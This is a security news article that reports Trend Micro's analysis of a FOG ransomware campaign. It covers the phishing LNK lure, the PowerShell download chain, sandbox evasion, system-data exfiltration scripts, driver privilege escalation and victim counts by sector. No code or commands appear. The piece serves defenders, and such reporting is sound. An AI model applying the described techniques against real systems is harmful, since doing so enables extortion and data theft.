FOG Ransomware Campaign Targets Multiple Sectors with Phishing and Payload Obfuscation
Ddos 
The initial ransom note dropped that uses DOGE-related references to troll | Image: Trend Micro
Trend Micro has identified a recent campaign involving FOG ransomware, demonstrating the adaptability of cybercriminals in their attempts to compromise systems and extort victims.
First detected between March 27 and April 2, FOG ransomware was observed across nine unique samples uploaded to VirusTotal. These variants shared key indicators: the use of a “.flocked” file extension, a readme.txt ransom note, and DOGE-themed content—a not-so-subtle reference to the U.S. Department of Government Efficiency (DOGE).
“The note also contains instructions to spread the ransomware payload to other computers by pasting the provided code in the note,” Trend Micro’s researchers reported.
The campaign may be operated either by the original FOG authors or by impersonators who repurpose the malware for their own agendas.
FOG ransomware uses familiar tactics to breach defenses. It arrives via phishing emails containing ZIP attachments—specifically, one named “Pay Adjustment.zip” that hides a disguised LNK file made to look like a PDF. When clicked, this file runs a PowerShell command to download a malicious script named stage1.ps1.
“The downloaded PowerShell script performs a multi-stage operation, retrieving a ransomware loader (cwiper.exe), ktool.exe and other PowerShell scripts,” the report explains.
The script even opens politically themed YouTube videos and includes written political commentary—indicating that attackers may be fusing ideological or satirical motives with cybercrime.
The report details the following files found within the payload samples:
- Lootsubmit.ps1: This script gathers system information and exfiltrates it to a remote server. It collects data such as IPv4 gateway IP, MAC address, geolocation data (using the Wigle API), hardware configuration, and system identifiers.
- Trackerjacker.ps1: This script is similar to “lootsubmit.ps1” but includes an updated function for MAC address resolution.
- Qrcode.png: This file displays a QR code directing victims to a Monero wallet address.
- Ktool.exe: This executable facilitates privilege escalation by exploiting a vulnerability in the Intel Network Adapter Diagnostic Driver (“iQVW64.sys”).
FOG ransomware takes pains to evade detection. The loader:
- Performs sandbox checks (processor count, RAM, registry values).
- Decrypts an embedded payload only if the environment appears genuine.
- Drops a dbgLog.sys log and a ransom note identical to earlier FOG variants.
“All discovered variants carry the same payload and only differ on the key used to decrypt the payload,” Trend Micro confirmed.
Since January 2025, the FOG ransomware group has claimed 100 victims, most notably in:
- Technology
- Education
- Manufacturing
- Transportation
Other affected sectors include healthcare, retail, and business services. February marked a peak, with 53 victims.
Among Trend Micro customers alone, there were 173 detections of FOG ransomware activity since June 2024, all of which have been successfully blocked.
“Outpace ransomware threats by monitoring indicators of compromise (IoCs)… to support forensic investigations and enhance threat prevention,” Trend advises.
Related Posts:
- Fog Ransomware Group Shifts Focus: Financial Sector Now in Crosshairs
- Fog & Akira Ransomware Exploit Critical Veeam RCE Flaw CVE-2024-40711 After PoC Release
- Thousands of SonicWall Devices Remain Vulnerable to CVE-2024-40766
- Malicious Go Packages Target Developers with Hidden Loader Malware on Linux and macOS
Donate